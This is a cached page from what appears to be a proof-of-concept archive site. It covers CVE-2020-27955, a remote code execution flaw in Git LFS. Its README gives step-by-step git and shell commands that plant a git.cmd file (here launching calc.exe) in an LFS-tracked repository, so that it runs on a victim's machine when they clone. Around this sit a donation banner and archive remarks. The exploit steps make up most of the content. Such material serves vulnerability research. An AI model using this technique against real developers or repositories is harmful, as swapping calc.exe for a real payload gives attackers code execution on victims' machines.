Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-27955 PoC — Git Lfs代码问题漏洞

Source
https://github.com/TheTh1nk3r/cve-2020-27955
Associated Vulnerability
Title:Git Lfs代码问题漏洞 (CVE-2020-27955)
Description:Git Lfs是Git Lfs团队的一个用于git项目中处理大文件的命令行工具。 Git LFS 2.12.0版本存在代码问题漏洞,该漏洞可造成远程代码执行的危害。
Description
cve-2020-27955
Readme
# cve-2020-27955
cve-2020-27955

#### 复现
1. 创建github仓库
2. git clone https://github.com/attacker/poc.git .
3. echo calc.exe > git.cmd
4. git lfs track “*.dat”
5. echo “Junk” > large.dat
6. git add -A
7. git commit -m “POC”
8. git push -u origin master -f
File Snapshot

 [4.0K]  /data/pocs/e739b0247aebea1acca7a4b34f4064446c6bcbc7
├── [   9]  git.cmd
├── [   5]  large.dat
└── [ 278]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.